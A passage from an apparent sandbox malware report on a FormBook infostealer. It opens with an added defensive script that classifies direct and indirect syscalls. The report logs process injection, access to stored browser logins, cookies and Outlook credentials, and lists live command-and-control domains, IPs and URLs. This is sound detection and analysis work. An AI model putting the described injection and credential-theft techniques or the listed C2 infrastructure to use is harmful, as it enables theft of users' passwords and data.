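Each "Direct from" line above records the address from which the named Nt* call entered the kernel. The signature's premise is that a legitimate call enters through the exported Nt* stub in ntdll, where user-mode EDR hooks are placed; a call issued from anywhere else never passes the hook. The practitioner's check on a memory dump or telemetry is to compare both the transition site and the return address against the process's module map: a transition executed outside ntdll is a direct syscall, and one inside ntdll whose return address lands in memory no module backs is an indirect syscall (the caller jumped into the stub's `syscall`/`ret` tail instead of calling the export). The script below is an added example and not part of the report. Its module map and call records are constructed for illustration: the report gives no module ranges for this process, so the 0x7738xxxx addresses above are deliberately not reused, and in a 32-bit WOW64 process such as these the transition runs through the Wow64 thunk rather than a native `syscall`, which changes where the stub lives but not the check.

```python
"""Classify Nt* call sites against a process module map: normal, direct or indirect syscall.

Added example; the module map and call records below are constructed, not taken from the report.
"""
from __future__ import annotations

from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


# Constructed module map.  Real values come from the analysed process (PEB->Ldr, a dump, or ETW).
MODULES = [
    Module("sample.exe", 0x00400000, 0x00080000),
    Module("kernelbase.dll", 0x75A00000, 0x00230000),
    Module("kernel32.dll", 0x76F00000, 0x000F0000),
    Module("ntdll.dll", 0x77D00000, 0x001A0000),
]

# Constructed call records: (syscall name, address of the kernel-transition instruction,
# return address control comes back to once the stub finishes).
CALLS = [
    ("NtCreateFile",         0x77D41E4C, 0x75A1F230),   # stub in ntdll, caller in kernelbase
    ("NtWriteVirtualMemory", 0x03651234, 0x0365123A),   # transition in unbacked memory
    ("NtResumeThread",       0x77D4312C, 0x036A4F00),   # stub in ntdll, returns to unbacked memory
    ("NtClose",              0x77D40F6C, 0x004021A0),   # stub in ntdll, caller in the image itself
]


def module_for(addr: int, modules: list[Module]) -> Module | None:
    """Return the module whose mapped range covers `addr`, or None for unbacked memory."""
    for mod in modules:
        if mod.contains(addr):
            return mod
    return None


def classify_call(site: int, ret: int, modules: list[Module]) -> str:
    """Decide how a syscall reached the kernel.

    direct   - the transition instruction is outside ntdll, so no hook on the exported stub
               could have seen the call;
    indirect - the transition is ntdll's own, but control returns to memory no module backs,
               i.e. the caller jumped into the stub's tail rather than calling the export;
    normal   - transition in ntdll and a module-backed return address.
    """
    site_mod = module_for(site, modules)
    if site_mod is None or site_mod.name.lower() != "ntdll.dll":
        return "direct syscall"
    if module_for(ret, modules) is None:
        return "indirect syscall"
    return "normal"


def triage(calls, modules) -> list[tuple[str, str]]:
    """Label every recorded call; a report's 'Direct from' value is the `site` column."""
    return [(name, classify_call(site, ret, modules)) for name, site, ret in calls]


def verdict_counts(calls, modules) -> dict[str, int]:
    return dict(Counter(v for _, v in triage(calls, modules)))


if __name__ == "__main__":
    for name, verdict in triage(CALLS, MODULES):
        print(f"{name:<22} {verdict}")
    print(verdict_counts(CALLS, MODULES))
```

A stricter version would also check that the site falls inside the stub of the named function (resolved from ntdll's export table) rather than anywhere in ntdll, which catches a caller that bounces off a different stub's tail; that needs the export table of the exact ntdll build and is left out here.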
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe  Section loaded: NULL target: C:\Windows\SysWOW64\bitsadmin.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\bitsadmin.exe  Section loaded: NULL target: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe protection: read write
                Source: C:\Windows\SysWOW64\bitsadmin.exe  Section loaded: NULL target: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\bitsadmin.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\bitsadmin.exe  Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\bitsadmin.exe  Thread register set: target process: 6196
                Source: C:\Windows\SysWOW64\bitsadmin.exe  Thread APC queued: target process: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Memory written: C:\Windows\SysWOW64\svchost.exe base: 2ABB008
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002BB106  LogonUserW
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_00283D19  GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002C411C  SendInput,keybd_event
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002C74BB  mouse_event
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
                Source: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe  Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\SysWOW64\bitsadmin.exe"
                Source: C:\Windows\SysWOW64\bitsadmin.exe  Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002BA66C  GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002C71FA  AllocateAndInitializeSid,CheckTokenMembership,FreeSid
                Source: QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: IProgram Manager
                Source: OUTSTANDING BALANCE PAYMENT.exe, QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Shell_TrayWnd
                Source: QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progman
                Source: OUTSTANDING BALANCE PAYMENT.exe  Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: QvLFrfAuvuCLc.exe, 00000004.00000002.4596502314.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000000.2303132097.0000000001190000.00000002.00000001.00040000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000002.4596552938.0000000001800000.00000002.00000001.00040000.00000000.sdmp  Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002A65C4  cpuid
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002D091D  GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002FB340  GetUserNameW
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_002B1E8E  __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe  Code function: 0_2_0029DDC0  GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\bitsadmin.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\bitsadmin.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: OUTSTANDING BALANCE PAYMENT.exe | Binary or memory string: WIN_81
Source: OUTSTANDING BALANCE PAYMENT.exe | Binary or memory string: WIN_XP
Source: OUTSTANDING BALANCE PAYMENT.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: OUTSTANDING BALANCE PAYMENT.exe | Binary or memory string: WIN_XPe
Source: OUTSTANDING BALANCE PAYMENT.exe | Binary or memory string: WIN_VISTA
Source: OUTSTANDING BALANCE PAYMENT.exe | Binary or memory string: WIN_7
Source: OUTSTANDING BALANCE PAYMENT.exe | Binary or memory string: WIN_8

Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket | 0_2_002D8C4F
Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe | Code function: 0_2_002D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket | 0_2_002D923B
MITRE ATT&CK Matrix (rebuilt from the flattened report table; techniques are listed per tactic in the matrix's row order; a number before a technique is the count the report attaches to it, and techniques without a number carry no count in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: 2 Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 3 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; 2 Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 Exploitation for Privilege Escalation; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading; 2 Valid Accounts; 21 Access Token Manipulation; 412 Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 2 Obfuscated Files or Information; 1 DLL Side-Loading; 2 Valid Accounts; 2 Virtualization/Sandbox Evasion; 21 Access Token Manipulation; 412 Process Injection
Credential Access: 1 OS Credential Dumping; 21 Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 System Time Discovery; 1 Account Discovery; 2 File and Directory Discovery; 116 System Information Discovery; 151 Security Software Discovery; 2 Virtualization/Sandbox Evasion; 3 Process Discovery; 11 Application Window Discovery; 1 System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; 21 Input Capture; 3 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 4 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph (ID 1563620; sample OUTSTANDING BALANCE PAYMENT.exe; start date 27/11/2024; architecture WINDOWS; score 100), rebuilt from the graph's text export.

Legend: Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Sample-level signatures: Suricata IDS alerts for network traffic; Multi AV Scanner detection for submitted file; Yara detected FormBook; 6 other signatures
Sample-level DNS/IP: www.soainsaat.xyz; www.duwixushx.xyz (Performs DNS queries to domains with low reputation); 14 other IPs or domains

Process tree:
OUTSTANDING BALANCE PAYMENT.exe (started)
    signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  svchost.exe (started by OUTSTANDING BALANCE PAYMENT.exe)
      signatures: Maps a DLL or memory area into another process
    QvLFrfAuvuCLc.exe (injected by svchost.exe)
        signatures: Found direct / indirect Syscall (likely to bypass EDR)
      bitsadmin.exe (started by QvLFrfAuvuCLc.exe)
          signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
        QvLFrfAuvuCLc.exe (injected by bitsadmin.exe)
            signatures: Found direct / indirect Syscall (likely to bypass EDR)
            DNS/IP: www.xcvbj.asia 149.88.81.190, ports 49858, 49865, 49872 (SAIC-ASUS, United States); www.duwixushx.xyz 156.251.17.224, ports 50032, 50033, 50034 (POWERLINE-AS-APPOWERLINEDATACENTERHK, Seychelles); 10 other IPs or domains
        firefox.exe (started by bitsadmin.exe)

Antivirus detection (Source | Detection | Scanner | Label):
OUTSTANDING BALANCE PAYMENT.exe | 39% | ReversingLabs | Win32.Trojan.AutoitInject
OUTSTANDING BALANCE PAYMENT.exe | 100% | Joe Sandbox ML |
No Antivirus matches (the report repeats this result for three further scan categories)
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1563620
                                                                Start date and time:2024-11-27 08:52:09 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 10m 9s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:2
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:OUTSTANDING BALANCE PAYMENT.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@7/3@17/12
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 86%
                                                                • Number of executed functions: 51
                                                                • Number of non-executed functions: 296
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • VT rate limit hit for: OUTSTANDING BALANCE PAYMENT.exe
Time | Type | Description
02:54:06 | API Interceptor | 10437549x Sleep call for process: bitsadmin.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.88.81.190 | PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse
• www.xcvbj.asia/hkgx/
149.88.81.190 | purchase Order.exe | Get hash | malicious | FormBook | Browse
• www.xcvbj.asia/rq1s/
149.88.81.190 | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• www.xcvbj.asia/rq1s/
156.251.17.224 | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse
• www.duwixushx.xyz/bmve/?Wno=a0qDq&KV=Rsosln+CouPFD70pouDpcL8MGxlXnptR0Qz9VzezY2yTYUIF1+nb00CRzlZGPtlDISGdoNhQK1cGxL7iAKAdT88wJdzRXyyanezdQrBbCEm548OmpMr0744=
172.67.167.146 | purchase Order.exe | Get hash | malicious | FormBook | Browse
• www.rgenerousrs.store/o362/
172.67.167.146 | Mandatory Notice for all December Leave and Vacation application.exe | Get hash | malicious | FormBook | Browse
• www.rgenerousrs.store/zr8v/
209.74.77.107 | Purchase Order PO.exe | Get hash | malicious | FormBook | Browse
• www.beyondfitness.live/fbpt/
209.74.77.107 | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• www.learnwithus.site/alu5/
185.27.134.144 | IETC-24017.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• www.amayavp.xyz/572a/
185.27.134.144 | purchase Order.exe | Get hash | malicious | FormBook | Browse
• www.amayavp.xyz/d9ku/
185.27.134.144 | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse
• www.amayavp.xyz/dcdf/
185.27.134.144 | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• www.amayavp.xyz/d9ku/
185.27.134.144 | shipping doc_20241111.exe | Get hash | malicious | FormBook | Browse
• www.hasthosting.xyz/04fb/
185.27.134.144 | SHIPPING DOC_20241107.exe | Get hash | malicious | FormBook | Browse
• www.hasthosting.xyz/04fb/
185.27.134.144 | http://outlook-accede-aqui.iceiy.com/ | Get hash | malicious | Unknown | Browse
• outlook-accede-aqui.iceiy.com/jquery.min.js
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.learnwithus.site | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• 209.74.77.107
r0lqcud7.nbnnn.xyz | REQUESTING FOR UPDATED SOA.exe | Get hash | malicious | FormBook | Browse
• 23.225.160.132
r0lqcud7.nbnnn.xyz | PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse
• 23.225.160.132
r0lqcud7.nbnnn.xyz | purchase Order.exe | Get hash | malicious | FormBook | Browse
• 27.124.4.246
r0lqcud7.nbnnn.xyz | Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe | Get hash | malicious | FormBook | Browse
• 202.79.161.151
r0lqcud7.nbnnn.xyz | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• 27.124.4.246
r0lqcud7.nbnnn.xyz | New Order - RCII900718_Contract Drafting.exe | Get hash | malicious | FormBook | Browse
• 23.225.159.42
www.xcvbj.asia | REQUESTING FOR UPDATED SOA.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
www.xcvbj.asia | PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
www.xcvbj.asia | purchase Order.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
www.xcvbj.asia | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
www.amayavp.xyz | IETC-24017.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• 185.27.134.144
www.amayavp.xyz | purchase Order.exe | Get hash | malicious | FormBook | Browse
• 185.27.134.144
www.amayavp.xyz | DOC_114542366.vbe | Get hash | malicious | FormBook | Browse
• 185.27.134.144
www.amayavp.xyz | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• 185.27.134.144
www.vayui.top | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse
• 172.67.145.234
www.vayui.top | S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse
• 104.21.95.160
www.vayui.top | purchase Order.exe | Get hash | malicious | FormBook | Browse
• 172.67.145.234
www.vayui.top | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• 172.67.145.234
www.7vh2wy.top | Item-RQF-9456786.exe | Get hash | malicious | Unknown | Browse
• 20.2.249.7
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
MULTIBAND-NEWHOPEUS | W3MzrFzSF0.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• 209.74.77.109
MULTIBAND-NEWHOPEUS | FACTURA 24V70 VINS.exe | Get hash | malicious | FormBook | Browse
• 209.74.64.190
MULTIBAND-NEWHOPEUS | DO-COSU6387686280.pdf.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• 209.74.77.109
MULTIBAND-NEWHOPEUS | packing list G25469.exe | Get hash | malicious | FormBook | Browse
• 209.74.64.59
MULTIBAND-NEWHOPEUS | IETC-24017.exe | Get hash | malicious | FormBook, PureLog Stealer | Browse
• 209.74.77.108
MULTIBAND-NEWHOPEUS | PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse
• 209.74.77.109
MULTIBAND-NEWHOPEUS | file.exe | Get hash | malicious | FormBook | Browse
• 209.74.77.109
MULTIBAND-NEWHOPEUS | VSP469620.exe | Get hash | malicious | FormBook | Browse
• 209.74.77.108
MULTIBAND-NEWHOPEUS | CV_ Filipa Barbosa.exe | Get hash | malicious | FormBook | Browse
• 209.74.77.108
MULTIBAND-NEWHOPEUS | Purchase Order PO.exe | Get hash | malicious | FormBook | Browse
• 209.74.77.107
CLOUDFLARENETUS | awb_shipping_post_27112024224782020031808174CN27112024000001124.vbs | Get hash | malicious | GuLoader, Remcos | Browse
• 104.21.91.199
CLOUDFLARENETUS | https://farhimzaman.com/files/Enquiry.js | Get hash | malicious | Unknown | Browse
• 1.1.1.1
CLOUDFLARENETUS | file.exe | Get hash | malicious | Unknown | Browse
• 172.67.142.108
CLOUDFLARENETUS | BitlordSetup_VOdKHS_0454250829.exe | Get hash | malicious | Deal Ply | Browse
• 104.21.61.178
CLOUDFLARENETUS | BitlordSetup_VOdKHS_0454250829.exe | Get hash | malicious | Deal Ply | Browse
• 172.67.212.154
CLOUDFLARENETUS | file.exe | Get hash | malicious | Unknown | Browse
• 104.21.82.174
CLOUDFLARENETUS | la.bot.arm5.elf | Get hash | malicious | Unknown | Browse
• 104.29.206.99
CLOUDFLARENETUS | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse
• 172.64.41.3
CLOUDFLARENETUS | file.exe | Get hash | malicious | LummaC Stealer | Browse
• 104.21.80.208
CLOUDFLARENETUS | ORDER-2411250089.PDF.js | Get hash | malicious | WSHRat, PureLog Stealer, Snake Keylogger | Browse
• 172.67.177.134
SAIC-ASUS | la.bot.arm6.elf | Get hash | malicious | Unknown | Browse
• 149.65.107.71
SAIC-ASUS | REQUESTING FOR UPDATED SOA.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
SAIC-ASUS | PAYROLL LIST.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
SAIC-ASUS | purchase Order.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
SAIC-ASUS | yakuza.i586.elf | Get hash | malicious | Mirai | Browse
• 139.121.41.93
SAIC-ASUS | arm4.elf | Get hash | malicious | Mirai | Browse
• 149.83.228.200
SAIC-ASUS | spc.elf | Get hash | malicious | Mirai | Browse
• 149.88.69.25
SAIC-ASUS | RFQ 3100185 MAHAD.exe | Get hash | malicious | FormBook | Browse
• 149.88.81.190
SAIC-ASUS | mips.elf | Get hash | malicious | Mirai | Browse
• 149.64.190.242
SAIC-ASUS | x86.elf | Get hash | malicious | Unknown | Browse
• 149.73.164.35
POWERLINE-AS-APPOWERLINEDATACENTERHK | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse
• 154.215.72.110
POWERLINE-AS-APPOWERLINEDATACENTERHK | loligang.ppc.elf | Get hash | malicious | Mirai | Browse
• 154.195.240.49
